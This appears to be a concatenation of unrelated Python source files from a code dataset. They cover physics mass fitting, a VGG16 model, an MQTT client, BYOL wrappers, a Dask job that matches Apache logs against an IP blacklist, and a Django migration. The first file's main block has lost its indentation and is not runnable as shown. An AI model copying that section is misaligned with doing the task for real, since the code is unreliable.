    ----------
    data : |hepds_type|
    predict_col : str
        Column holding the classifier prediction that is scanned over.
    fit_col : str
        Column the mass fit is performed on.
    region : tuple(numerical, numerical)
        The lower and upper points to integrate over.
    x : RooRealVar

    Returns
    -------
    tuple(array, list)
        The scanned cut values and the metric score for each of them.
    """
    from raredecay.tools.metrics import punzi_fom, precision_measure

    predict_col = dev_tool.entries_to_str(predict_col)
    fit_col = dev_tool.entries_to_str(fit_col)
    metric_name = metric  # keep the string for labelling purposes
    if metric == "punzi":
        metric = punzi_fom
    elif metric == "precision":
        metric = precision_measure
    # TODO: convert metric strings to metric
    n_steps = int(np.floor_divide(1, stepsize))
    if n_steps < 1:
        raise ValueError("stepsize has to be smaller then 1, not", stepsize)
    cuts = np.linspace(0, 1, num=n_steps, endpoint=False)
    plots = int(10 / n_steps)  # NOTE(review): presumably meant n_steps / 10 -- verify
    current_plot = 0
    if not isinstance(predict_col, str) or not isinstance(fit_col, str):
        raise TypeError("predict_col and/or fit_col is not a string but has to be.")
    scores = []
    for cut in cuts:
        # FIX: temp_plot_importance was previously only assigned when
        # plot_importance > 2, leaving the name unbound (NameError) otherwise.
        if plot_importance > 2 and plots > current_plot:
            temp_plot_importance = plot_importance
        else:
            temp_plot_importance = 0
        # Reduce the main storage to the events passing the cut.
        temp_data = data.copy_storage(columns=[predict_col, fit_col], add_to_name="")
        temp_df = temp_data.pandasDF()
        temp_df = temp_df[cut < temp_df[predict_col]]
        temp_data.set_data(temp_df)
        n_sig_weighted = sum(temp_data.get_weights()[temp_data.get_targets() == 1])
        if second_storage is not None:
            temp_second_storage = second_storage.copy_storage(
                columns=[predict_col, fit_col], add_to_name=""
            )
            temp_df = temp_second_storage.pandasDF()
            temp_df = temp_df[cut < temp_df[predict_col]]
            temp_second_storage.set_data(temp_df)
            n_sig_weighted += sum(
                temp_second_storage.get_weights()[
                    temp_second_storage.get_targets() == 1
                ]
            )
        else:
            temp_second_storage = second_storage
        # FIX: fit_mass returns a 3-tuple (n_sig, n_bkg, pdf-or-sweights);
        # unpacking into two names raised a ValueError on every iteration.
        n_sig_fit, n_bkg_fit, _ = fit_mass(
            data=temp_data,
            column=fit_col,
            x=x,
            sig_pdf=sig_pdf,
            bkg_pdf=bkg_pdf,
            n_sig=n_sig,
            n_bkg=n_bkg,
            blind=False,
            nll_profile=False,
            second_storage=temp_second_storage,
            plot_importance=temp_plot_importance,
            bkg_in_region=region,
        )
        scores.append(metric(n_signal=n_sig_weighted, n_background=n_bkg_fit))
    return cuts, scores
if __name__ == "__main__":
import ROOT
from ROOT import (
RooRealVar,
RooArgList,
RooArgSet,
RooAddPdf,
RooDataSet,
RooAbsReal,
)
from ROOT import RooFit, RooCBShape, RooExponential
from ROOT import RooGaussian, RooMinuit
from ROOT import (
TCanvas,
) # HACK to prevent not plotting canvas by root_numpy import. BUG.
from root_numpy import array2tree
from ROOT import RooCategory, RooUnblindPrecision
# data = RooDataSet("data", )
from raredecay.tools.data_storage import HEPDataStorage
import pandas as pd
import matplotlib.pyplot as plt
# np.random.seed(40)
mode = "fit"
# mode = 'fit_metric'
# mode = "sPlot"
# mode = 'ks'
# create signal pdf BEGIN
lower_bound = 4800
# lower_bound = 5000
x = RooRealVar("x", "x variable", lower_bound, 6000)
# x = RooRealVar("x", "x variable", 4800, 6000)
# TODO: export somewhere? does not need to be defined inside...
mean = RooRealVar(
"mean", "Mean of Double CB PDF", 5280, 5270, 5290
) # , 5300, 5500)
sigma = RooRealVar("sigma", "Sigma of Double CB PDF", 40, 0, 45)
alpha_0 = RooRealVar("alpha_0", "alpha_0 of one side", 40, 30, 50)
alpha_1 = RooRealVar("alpha_1", "alpha_1 of other side", -40, -50, -30.0)
lambda_0 = RooRealVar("lambda_0", "Exponent of one side", 40, 30, 50)
lambda_1 = RooRealVar("lambda_1", "Exponent of other side", 40, 30, 50)
# TODO: export somewhere? pdf construction
frac = RooRealVar("frac", "Fraction of crystal ball pdfs", 0.479, 0.01, 0.99)
crystalball1 = RooCBShape(
"crystallball1", "First CrystalBall PDF", x, mean, sigma, alpha_0, lambda_0
)
crystalball2 = RooCBShape(
"crystallball2", "Second CrystalBall PDF", x, mean, sigma, alpha_1, lambda_1
)
doubleCB = RooAddPdf(
"doubleCB", "Double CrystalBall PDF", crystalball1, crystalball2, frac
)
# create signal pdf END
# create bkg-pdf BEGIN
lambda_exp = RooRealVar(
"lambda_exp", "lambda exp pdf bkg", -0.002, -10.0, -0.000001
)
bkg_pdf = RooExponential("bkg_pdf", "Background PDF exp", x, lambda_exp)
# create bkg-pdf END
n_sig = 25000
data = pd.DataFrame(
np.random.normal(loc=5280, scale=37, size=(n_sig, 3)),
columns=["x", "y", "pred"],
)
# data['pred'] = np.array([min((abs(y), 0.99)) for y in np.random.normal(loc=0.6, scale=0.25, size=n_sig)])
bkg_data = np.array(
[
i
for i in (np.random.exponential(scale=300, size=(7500, 3)) + 4800)
if i[0] < 6000
]
)
bkg_data[:, 2] = np.array(
[
min((abs(y), 0.96))
for y in np.random.normal(loc=0.4, scale=0.4, size=len(bkg_data))
]
)
data = pd.concat(
[data, pd.DataFrame(bkg_data, columns=["x", "y", "pred"])], ignore_index=True
)
data = HEPDataStorage(
data, target=np.concatenate((np.ones(n_sig), np.zeros(len(bkg_data))))
)
data_copy = data.copy_storage()
if mode == "fit":
fit_result = fit_mass(
data=data,
column="x",
sig_pdf=doubleCB,
x=x,
bkg_pdf=bkg_pdf,
# blind=False,
blind=(5100, 5380),
plot_importance=4, # bkg_in_region=(5100, 5380)
)
print(fit_result)
print("True values: nsig =", n_sig, " n_bkg =", len(bkg_data))
elif mode == "fit_metric":
result = metric_vs_cut_fitted(
data=data,
predict_col="pred",
fit_col="x",
sig_pdf=doubleCB,
bkg_pdf=bkg_pdf,
x=x,
region=(5100, 5380),
stepsize=0.01,
)
print(result)
plt.plot(*result)
elif mode == "sPlot":
fit_result = fit_mass(
data=data,
column="x",
sig_pdf=doubleCB,
x=x,
bkg_pdf=bkg_pdf,
blind=False,
plot_importance=1, # bkg_in_region=(5100, 5380)
sPlot=True,
)
n_sig, n_bkg, sweights = fit_result
import copy
sweights = copy.deepcopy(sweights)
plt.figure("new figure")
# plt.hist(range(100))
# plt.figure("new figure")
plt.hist(sweights, bins=30)
data_copy.set_weights(sweights)
data_copy.plot()
elif mode == "ks":
pass
input("Finished, press 'Enter' to close ROOT plots.")
plt.show()
input("Finished, press 'Enter' to close plots.")
| StarcoderdataPython |
5029946 | <reponame>calmisential/TensorFlow2.0-MNIST
import tensorflow as tf
from config import *
def VGG16():
    """Build the 16-layer VGG network as a Keras ``Sequential`` model.

    Architecture: five convolutional stages (2, 2, 3, 3 and 3 conv layers
    with 64 / 128 / 256 / 512 / 512 filters respectively), each stage
    followed by 2x2 max pooling, then a classifier head of two 4096-unit
    ReLU dense layers and a softmax output over ``NUM_CLASSES``.  The
    input shape comes from the config module
    (``image_height``, ``image_width``, ``channels``).
    """
    def conv3x3(filters, **extra):
        # 3x3 same-padded ReLU convolution with stride 1.
        return tf.keras.layers.Conv2D(filters=filters,
                                      kernel_size=(3, 3),
                                      strides=1,
                                      padding='same',
                                      activation=tf.keras.activations.relu,
                                      **extra)

    def pool2x2():
        # 2x2 max pooling with stride 2.
        return tf.keras.layers.MaxPool2D(pool_size=(2, 2),
                                         strides=2,
                                         padding='same')

    model = tf.keras.Sequential()
    # Stage 1 -- the first conv layer also fixes the input shape.
    model.add(conv3x3(64, input_shape=(image_height, image_width, channels)))
    model.add(conv3x3(64))
    model.add(pool2x2())
    # Stage 2
    model.add(conv3x3(128))
    model.add(conv3x3(128))
    model.add(pool2x2())
    # Stage 3
    for _ in range(3):
        model.add(conv3x3(256))
    model.add(pool2x2())
    # Stages 4 and 5 share the same 3x conv(512) + pool layout.
    for _ in range(2):
        for _ in range(3):
            model.add(conv3x3(512))
        model.add(pool2x2())
    # Classifier head.
    model.add(tf.keras.layers.Flatten())
    model.add(tf.keras.layers.Dense(units=4096,
                                    activation=tf.keras.activations.relu))
    model.add(tf.keras.layers.Dense(units=4096,
                                    activation=tf.keras.activations.relu))
    model.add(tf.keras.layers.Dense(units=NUM_CLASSES,
                                    activation=tf.keras.activations.softmax))
    return model
# declare the lists and working variables
x=[0,0,0,0] #x column
y=[0,0,0,0] #y column
xy=[0,0,0,0] #x*y column
x2=[0,0,0,0] #x² column
a=0 #used as the loop counter at this first stage
b=0 #intercept, computed after the loop
while(a<3): #loop to read the x and y values
    x[a]=float(input("Digite um valora para x... ")) #read an x value and store it in the x-column list
    y[a]=float(input("Digite um valora para Y... ")) #read a y value and store it in the y-column list
    xy[a]=x[a]*y[a] #multiply x by y
    x2[a]=x[a]*x[a] #square x and store it in x2
    a+=1 #advance to the next row until the "table" has 3 rows
#filling the last (totals) row with the column sums
x[3]=x[0]+x[1]+x[2]
y[3]=y[0]+y[1]+y[2]
xy[3]=xy[0]+xy[1]+xy[2]
x2[3]=x2[0]+x2[1]+x2[2]
a=(3*xy[3]-x[3]*y[3])/(3*x2[3]-(x[3]**2)) #reuse a: least-squares slope for n=3 points
b=(y[3]/3)-((a*x[3])/3) #intercept from the means: b = mean(y) - a*mean(x)
print(f"y={a}x+{b}")
6476802 | from circus.commands.base import Command
from circus.exc import ArgumentError, MessageError
from circus.util import convert_opt
class Get(Command):
    """\
    Get the value of specific watcher options
    =========================================
    This command can be used to query the current value of one or
    more watcher options.
    ZMQ Message
    -----------
    ::
        {
            "command": "get",
            "properties": {
                "keys": ["key1, "key2"]
                "name": "nameofwatcher"
            }
        }
    A request message contains two properties:
    - keys: list, The option keys for which you want to get the values
    - name: name of watcher
    The response object has a property ``options`` which is a
    dictionary of option names and values.
    eg::
        {
            "status": "ok",
            "options": {
                "graceful_timeout": 300,
                "send_hup": True,
            },
            time': 1332202594.754644
        }
    Command line
    ------------
    ::
        $ circusctl get <name> <key1> <key2>
    """
    name = "get"
    properties = ['name', 'keys']

    def message(self, *args, **opts):
        # Need at least a watcher name plus one option key.
        if len(args) < 2:
            raise ArgumentError("Invalid number of arguments")
        return self.make_message(name=args[0], keys=args[1:])

    def execute(self, arbiter, props):
        watcher = self._get_watcher(arbiter, props.get('name'))
        # Collect the requested option values; the first unknown key aborts
        # the whole request with an error.
        options = {}
        for key in props.get('keys', []):
            if key not in watcher.optnames:
                raise MessageError("%r option not found" % key)
            options[key] = getattr(watcher, key)
        return {"options": options}

    def console_msg(self, msg):
        if msg['status'] != "ok":
            return self.console_error(msg)
        # One "key: value" line per returned option.
        lines = ["%s: %s" % (key, convert_opt(key, value))
                 for key, value in msg.get('options', {}).items()]
        return "\n".join(lines)
8058813 | <filename>frimcla/command_line.py
from __future__ import absolute_import
from . import fullAnalysis
import argparse
import sys
def main():
    """Console entry point: run a full FrImCla analysis on the given path.

    Expects exactly one positional command-line argument.  Exits with a
    usage message instead of an uncaught IndexError when it is missing.
    """
    if len(sys.argv) < 2:
        # Previously this crashed with IndexError on bare invocation.
        sys.exit("usage: frimcla <analysis-path>")
    fullAnalysis.fullAnalysis(sys.argv[1])
5024420 | <reponame>taufikxu/RepLibrary<gh_stars>0
import time
import torch
import torch.nn as nn
from Tools import FLAGS
from library.data_iters import dataset_info, get_data_augmentation
def l2_norm(inputx):
    """Normalise each row of a 2-D tensor to unit Euclidean length."""
    assert len(inputx.shape) == 2
    row_norms = inputx.pow(2).sum(dim=1, keepdim=True).sqrt()
    return inputx / row_norms
def identity(x):
    """No-op normaliser: return the input unchanged."""
    return x
class mlpModule(nn.Module):
    """Two-layer MLP head: Linear -> norm_layer -> ReLU -> Linear (no bias)."""

    def __init__(self, input_dim, hidden_dim, output_dim, norm_layer):
        super().__init__()
        # Attribute names (fc1 / bn / fc2 / relu) are kept stable so existing
        # checkpoints continue to load.
        self.fc1 = nn.Linear(input_dim, hidden_dim)
        self.bn = norm_layer(hidden_dim)
        self.fc2 = nn.Linear(hidden_dim, output_dim, bias=False)
        self.relu = nn.ReLU()

    def forward(self, x):
        # fc1 -> norm -> relu -> fc2, expressed as a single pipeline.
        return self.fc2(self.relu(self.bn(self.fc1(x))))
class ByolWrapper(nn.Module):
    """BYOL-style wrapper: backbone -> projector -> predictor, plus a linear
    probe (``classifier``) fed with detached backbone features.

    ``normalize`` is a string naming the normalisation applied to the
    projector / predictor outputs (e.g. ``"l2_norm"`` or ``"identity"``);
    it is resolved with ``eval`` at construction time.
    """

    def __init__(self, backbone, projector, predictor, classifier, normalize="l2_norm"):
        super().__init__()
        self.backbone = backbone
        self.projector = projector
        self.predictor = predictor
        self.classifier = classifier
        # NOTE(review): eval() on a caller-supplied string -- acceptable for
        # trusted config values, unsafe for untrusted input.
        self.normalize = eval(normalize)

    def forward(self, x, y=None):
        features = self.backbone(x)
        projection = self.projector(features)
        # Two-argument mode: return only the raw features plus the
        # normalised projection (no predictor / probe heads).
        if y is not None:
            return features, self.normalize(projection)
        prediction = self.predictor(projection)
        # The linear probe never backpropagates into the backbone.
        probe_logits = self.classifier(features.detach())
        return self.normalize(projection), self.normalize(prediction), probe_logits

    def forward_cla(self, x):
        """Run only the linear probe on pre-computed features."""
        return self.classifier(x)
class EbmWrapper(nn.Module):
    """Energy-based-model wrapper: the backbone (called in "1dim" mode)
    yields an energy value plus a feature embedding; a linear probe
    (``classifier``) is trained on the detached embedding."""

    def __init__(self, backbone, classifier):
        super().__init__()
        self.backbone = backbone
        self.classifier = classifier

    def forward(self, x):
        energy, features = self.backbone(x, "1dim")
        # Probe gradients must not reach the backbone.
        probe_logits = self.classifier(features.detach())
        return energy, features, probe_logits

    def forward_cla(self, x):
        """Run only the linear probe on pre-computed features."""
        return self.classifier(x)
| StarcoderdataPython |
9628949 | ################################################################################
# MIT License
#
# Copyright (c) 2017 <NAME> & <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
################################################################################
from twisted.internet.defer import inlineCallbacks, returnValue
from twisted.application.internet import ClientService, backoffPolicy
from twisted.internet.endpoints import clientFromString
from twisted.internet.protocol import Factory
from protocol import MQTTProtocol
from definitions import *
class MQTTWorker(ClientService):
    """Twisted ClientService that keeps an MQTT connection alive (with
    backoff-based reconnects) and tracks in-flight subscribe/publish
    requests plus per-topic callbacks."""

    def __init__(self, reactor, config):
        self.endpoint = clientFromString(reactor, config["endpoint"])
        self.factory = Factory.forProtocol(MQTTProtocol)
        self.version = VERSION[config["version"]]
        self.clientId = config["client_id"]
        self.username = config["username"]
        self.appKey = config["app_key"]
        self.protocol = None
        # In-flight subscribe requests, keyed by request id.
        self.subscribe_requests = {}
        # Callback registered for each subscribed topic.
        self.topics = {}
        # Publishes waiting for an ack, keyed by request id.
        self.publish_requests = {}
        ClientService.__init__(self, self.endpoint, self.factory, retryPolicy=backoffPolicy())

    def start(self):
        print("INFO: Starting MQTT Client")
        self.whenConnected().addCallback(self.connected)
        self.startService()

    def connected(self, protocol):
        print("INFO: Client Connected")
        self.protocol = protocol
        protocol.connect(self)

    def joined(self):
        print("INFO: MQTT joined")

    @inlineCallbacks
    def subscribe(self, topic, function, qos=0):
        yield self.protocol.subscribe(topic, function, qos)

    @inlineCallbacks
    def publish(self, topic, message, qos=0):
        yield self.protocol.publish(topic, message, qos)

    def addSubscribeRequest(self, request, d):
        # XXX To Do: Add boolean to know if a timer should be start
        # First registration wins; re-adding the same id is a no-op.
        self.subscribe_requests.setdefault(request._id, d)

    def getSubscribeRequest(self, _id, remove=False):
        if remove:
            return self.subscribe_requests.pop(_id, None)
        return self.subscribe_requests.get(_id)

    def addTopic(self, topic, function):
        self.topics.setdefault(topic, function)

    def getTopic(self, topic):
        return self.topics.get(topic)

    def addPublishRequest(self, request, d):
        # XXX To Do: Add boolean to know if a timer should be start
        self.publish_requests.setdefault(request._id, d)

    def getPublishRequest(self, _id, remove=False):
        if remove:
            return self.publish_requests.pop(_id, None)
        return self.publish_requests.get(_id)
| StarcoderdataPython |
9735469 | import time
import argparse
import json
import os
import glob
import sys
import re
import random
import string
# parse the arguments
parser = argparse.ArgumentParser(description="Apache data cleaning + join")
# --path may be a single log file or a directory of *.*.*.txt logs
# (directory handling happens below when the path is not a file).
parser.add_argument(
    "--path",
    type=str,
    dest="data_path",
    default="../../test/resources/2000.01.01.txt",
    help="path or pattern to log data",
)
parser.add_argument(
    "--ip_blacklist_path",
    type=str,
    dest="ip_blacklist_path",
    default="../../test/resources/bad_ips_all.txt",
    help="path or pattern to the ip blacklist",
)
# "regex"/"strip" parse whole lines with a single function; the "split_*"
# variants build each column with its own per-field step.
parser.add_argument(
    "--pipeline_type",
    type=str,
    dest="pipeline_type",
    choices=["regex", "strip", "split_regex", "split"],
    default="regex",
    help="whether to use the regex clean function or the string strip based one",
)
parser.add_argument(
    "--output-path",
    type=str,
    dest="output_path",
    default="dask_output/",
    help='specify path where to save output data files',
)
args = parser.parse_args()
# define the parsing functions
def ParseWithRegex(logline):
    """Parse one line in the Apache Common Log format.

    Returns a 9-tuple ``(ip, client_id, user_id, date, method, endpoint,
    protocol, response_code, content_size)``.  A line that does not match
    the format yields empty strings with both numeric fields set to -1;
    a "-" content size is reported as 0.
    """
    no_match = ("", "", "", "", "", "", "", -1, -1)
    try:
        m = re.search(
            r'^(\S+) (\S+) (\S+) \[([\w:/]+\s[+\-]\d{4})\] "(\S+) (\S+)\s*(\S*)\s*" (\d{3}) (\S+)',
            logline,
        )
        if m is None:
            return no_match
        raw_size = m.group(9)
        size = 0 if raw_size == "-" else int(raw_size)
        return (
            m.group(1),
            m.group(2),
            m.group(3),
            m.group(4),
            m.group(5),
            m.group(6),
            m.group(7),
            int(m.group(8)),
            size,
        )
    except:
        # Mirror the original contract: any unexpected failure is reported
        # as a non-matching line rather than raised.
        return no_match
def extract_ip(x):
    """First space-terminated token of the log line (client host), or ''."""
    m = re.search(r"(^\S+) ", x)
    return m[1] if m else ''
def extract_client_id(x):
    """Second space-terminated token of the log line (client identity), or ''."""
    m = re.search(r"^\S+ (\S+) ", x)
    return m[1] if m else ''
def extract_user_id(x):
    """Third space-terminated token of the log line (authenticated user), or ''."""
    m = re.search(r"^\S+ \S+ (\S+) ", x)
    return m[1] if m else ''
def extract_date(x):
    """Timestamp between the square brackets (incl. timezone offset), or ''."""
    m = re.search(r"^.*\[([\w:/]+\s[+\-]\d{4})\]", x)
    return m[1] if m else ''
def extract_method(x):
    """HTTP method from the quoted request section, or ''."""
    m = re.search(r'^.*"(\S+) \S+\s*\S*\s*"', x)
    return m[1] if m else ''
def extract_endpoint(x):
    """Requested path from the quoted request section, or ''."""
    m = re.search(r'^.*"\S+ (\S+)\s*\S*\s*"', x)
    return m[1] if m else ''
def extract_protocol(x):
    """Protocol string from the quoted request section (may be empty), or ''."""
    m = re.search(r'^.*"\S+ \S+\s*(\S*)\s*"', x)
    return m[1] if m else ''
def extract_response_code(x):
    """Three-digit HTTP status code after the request quotes, or -1."""
    m = re.search(r'^.*" (\d{3}) ', x)
    return int(m[1]) if m else -1
def extract_content_size(x):
    """Response body size in bytes; "-" maps to 0, no match maps to -1."""
    m = re.search(r'^.*" \d{3} (\S+)', x)
    if not m:
        return -1
    return 0 if m[1] == '-' else int(m[1])
def ParseWithStrip(x):
    """Parse an Apache Common Log line using successive find/slice steps.

    Returns the same 9-tuple layout as ParseWithRegex:
    (ip, client_id, user_id, date, method, endpoint, protocol,
    response_code, content_size).  Lines whose request section has no
    space before the closing quote yield ("", ..., -1, -1); any
    unexpected exception yields ("", ..., -2, -2).
    """
    try:
        y = x.strip()
        # ip / client id / user id: the first three space-separated tokens.
        i = y.find(" ")
        ip = y[:i]
        y = y[i + 1 :]
        i = y.find(" ")
        client_id = y[:i]
        y = y[i + 1 :]
        i = y.find(" ")
        user_id = y[:i]
        y = y[i + 1 :]
        # Date: bracketed "[...]"; the leading "[" is stripped with [1:].
        i = y.find("]")
        date = y[:i][1:]
        y = y[i + 2 :]
        # Skip to just past the opening quote of the request section.
        y = y[y.find('"') + 1 :]
        method = ""
        endpoint = ""
        protocol = ""
        failed = False
        # A well-formed request has a space before the closing quote
        # ("METHOD /path PROTO"); otherwise the line is treated as failed.
        if y.find(" ") < y.rfind('"'):
            i = y.find(" ")
            method = y[:i]
            y = y[i + 1 :]
            i = y.find(" ")  # needs to be any whitespace
            endpoint = y[:i]
            y = y[i + 1 :]
            i = y.rfind('"')
            protocol = y[:i]
            # Keep only the last token before the closing quote.
            protocol = protocol[protocol.rfind(" ") + 1 :]
            y = y[i + 2 :]
        else:
            failed = True
            i = y.rfind('"')
            y = y[i + 2 :]
        # Status code and content size follow the closing quote.
        i = y.find(" ")
        response_code = y[:i]
        content_size = y[i + 1 :]
        if not failed:
            return (
                ip,
                client_id,
                user_id,
                date,
                method,
                endpoint,
                protocol,
                int(response_code),
                0 if content_size == "-" else int(content_size),
            )
        else:
            return ("", "", "", "", "", "", "", -1, -1)
    except:
        # Any slicing/conversion failure is flagged with the -2 sentinel.
        return ("", "", "", "", "", "", "", -2, -2)
def RandomizeEndpointUDF(x):
    """Anonymise a user-home endpoint: a leading "/~username" segment is
    replaced with "/~" plus 10 random uppercase letters; any other path is
    returned unchanged."""
    suffix = "".join(random.choice(string.ascii_uppercase) for _ in range(10))
    return re.sub(r"^/~[^/]+", "/~" + suffix, x)
def try_int(x):
    """Best-effort int conversion: return ``int(x)``, or -1 when *x* is not
    a valid integer (e.g. '', None, or a garbled token from a bad row)."""
    try:
        return int(x)
    except (TypeError, ValueError):
        # Narrowed from a bare `except:` so that e.g. KeyboardInterrupt is
        # no longer swallowed; conversion failures still map to -1.
        return -1
# save the run configuration
output_path = args.output_path
# "regex"/"strip" pick a whole-line parser here; the "split_*" variants are
# dispatched separately inside the __main__ block below.
clean_function = ParseWithRegex if args.pipeline_type == "regex" else ParseWithStrip
# get the input files
perf_paths = [args.data_path]
if not os.path.isfile(args.data_path):
    # inner join in dask is broken, run therefore without 4G of data
    file_paths = sorted(list(filter(lambda p: not '2011.12.08' in p and not '2011.12.09' in p, glob.glob(os.path.join(args.data_path, "*.*.*.txt")))))
    perf_paths = file_paths
if not perf_paths:
    print("found no log data to process, abort.")
    sys.exit(1)
if __name__ == "__main__":
    # import dask
    # Dask is imported lazily here so that the startup cost can be timed.
    startup_time = 0
    tstart = time.time()
    import dask
    import dask.dataframe as dd
    import dask.bag as db
    from dask.diagnostics import ProgressBar
    from dask.distributed import Client
    import dask.multiprocessing
    import os
    import glob
    import sys
    import pandas as pd
    import numpy as np
    client = Client(n_workers=16, threads_per_worker=1, processes=True, memory_limit='8GB')
    print(client)
    startup_time = time.time() - tstart
    print("Dask startup time: {}".format(startup_time))
    # define regex function
    # open file
    print("*Dask Start Time: {}".format(time.time()))
    # parse the rows
    # Each branch builds the same columns; they differ only in how a raw
    # log line is split into fields.
    if args.pipeline_type == 'split_regex':
        # One regex pass per output column (extract_* helpers above).
        tstart = time.time()
        b = db.read_text(perf_paths, linedelimiter="\n")
        df = b.to_dataframe()
        df["ip"] = df[0].apply(extract_ip, meta=str)
        df["client_id"] = df[0].apply(extract_client_id, meta=str)
        df["user_id"] = df[0].apply(extract_user_id, meta=str)
        df["date"] = df[0].apply(extract_date, meta=str)
        df["method"] = df[0].apply(extract_method, meta=str)
        df["endpoint"] = df[0].apply(extract_endpoint, meta=str)
        df["protocol"] = df[0].apply(extract_protocol, meta=str)
        df["response_code"] = df[0].apply(extract_response_code, meta=int)
        df["content_size"] = df[0].apply(extract_content_size, meta=int)
        df = df[df.endpoint.str.len() > 0]
        df["endpoint"] = df['endpoint'].apply(RandomizeEndpointUDF, meta=str)
    elif args.pipeline_type == 'split':
        # Column-by-column extraction from a single space-split of the line.
        tstart = time.time()
        b = db.read_text(perf_paths, linedelimiter="\n")
        df = b.to_dataframe()
        df["cols"] = df[0].apply(lambda x: x.split(' '), meta=object)
        df["ip"] = df['cols'].apply(lambda x: x[0].strip() if len(x) > 0 else '', meta=str)
        df["client_id"] = df['cols'].apply(lambda x: x[1].strip() if len(x) > 1 else '', meta=str)
        df["user_id"] = df['cols'].apply(lambda x: x[2].strip() if len(x) > 2 else '', meta=str)
        # Date spans two tokens ("[dd/Mon/yyyy:hh:mm:ss" and "+zzzz]");
        # the surrounding brackets are stripped with [1:-1] below.
        df["date"] = df['cols'].apply(lambda x: x[3] + " " + x[4] if len(x) > 4 else '', meta=str)
        df["date"] = df['date'].apply(lambda x: x.strip(), meta=str)
        df["date"] = df['date'].apply(lambda x: x[1:-1], meta=str)
        df["method"] = df['cols'].apply(lambda x: x[5].strip() if len(x) > 5 else '', meta=str)
        df["method"] = df['method'].apply(lambda x: x[1:], meta=str)
        df["endpoint"] = df['cols'].apply(lambda x: x[6].strip() if len(x) > 6 else '', meta=str)
        df["protocol"] = df['cols'].apply(lambda x: x[7].strip() if len(x) > 7 else '', meta=str)
        df["protocol"] = df['protocol'].apply(lambda x: x[:-1], meta=str)
        df["response_code"] = df['cols'].apply(lambda x: try_int(x[8].strip()) if len(x) > 8 else -1, meta=int)
        df["content_size"] = df['cols'].apply(lambda x: x[9].strip() if len(x) > 9 else '', meta=str)
        df["content_size"] = df['content_size'].apply(lambda x: 0 if x == '-' else try_int(x), meta=int)
        df = df[df.endpoint.str.len() > 0]
        df["endpoint"] = df['endpoint'].apply(RandomizeEndpointUDF, meta=str)
    else:
        # "regex" / "strip": a single whole-line parser returning a 9-tuple.
        tstart = time.time()
        b = db.read_text(perf_paths, linedelimiter="\n")
        df = b.to_dataframe()
        df["new"] = df[0].apply(clean_function, meta=(0, "object"))
        df["ip"] = df["new"].apply(lambda x: x[0], meta=str)
        df["client_id"] = df["new"].apply(lambda x: x[1], meta=str)
        df["user_id"] = df["new"].apply(lambda x: x[2], meta=str)
        df["date"] = df["new"].apply(lambda x: x[3], meta=str)
        df["method"] = df["new"].apply(lambda x: x[4], meta=str)
        df["endpoint"] = (
            df["new"].apply(lambda x: x[5], meta=str).apply(RandomizeEndpointUDF, meta=str)
        )
        df["protocol"] = df["new"].apply(lambda x: x[6], meta=str)
        df["response_code"] = df["new"].apply(lambda x: x[7], meta=int)
        df["content_size"] = df["new"].apply(lambda x: x[8], meta=int)
    # join on bad ips
    # Single-partition blacklist joined against the parsed requests.
    bad_ip_df = dd.read_csv([args.ip_blacklist_path], low_memory=False).repartition(npartitions=1)
    df_malicious_requests = dd.merge(
        df, bad_ip_df, left_on="ip", right_on="BadIPs", how="inner"
    )
    df_malicious_requests = df_malicious_requests[
        [
            "ip",
            "date",
            "method",
            "endpoint",
            "protocol",
            "response_code",
            "content_size",
        ]
    ]
    df_malicious_requests.to_csv(output_path, index=None)
    job_time = time.time() - tstart
    print("Dask job time: {} s".format(job_time))
    print(json.dumps({"startupTime": startup_time, "jobTime": job_time}))
| StarcoderdataPython |
8000657 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-11-13 17:46
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    # Auto-generated Django migration (see header): creates the initial
    # Argument and ArgumentVote tables for the arguments app.  Do not edit
    # the operations by hand; generate a follow-up migration instead.
    initial = True
    dependencies = [
        ('premises', '0001_initial'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        # Argument: a conclusion supported by two premises, owned by a user.
        migrations.CreateModel(
            name='Argument',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('pub_date', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date published')),
                ('staged', models.DateTimeField(blank=True, null=True)),
                ('aim', models.IntegerField(choices=[(1, 'To support the positive version of the conclusion.'), (2, 'To support the negative version of the conclusion.'), (3, 'To point why a decision on the matter is required soon.'), (4, 'To point out missing knowledge on the matter.')], default=1)),
                ('conclusion', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='conclusion', to='premises.Premise')),
                ('premise1', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='premise1', to='premises.Premise')),
                ('premise2', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='premise2', to='premises.Premise')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'abstract': False,
                'get_latest_by': 'pub_date',
            },
        ),
        # ArgumentVote: a user's 1-4 validity rating of an Argument.
        migrations.CreateModel(
            name='ArgumentVote',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('pub_date', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date published')),
                ('last_voted', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last voted')),
                ('value', models.IntegerField(choices=[(1, 'completely invalid'), (2, 'weak'), (3, 'strong'), (4, 'completely valid')], default=1)),
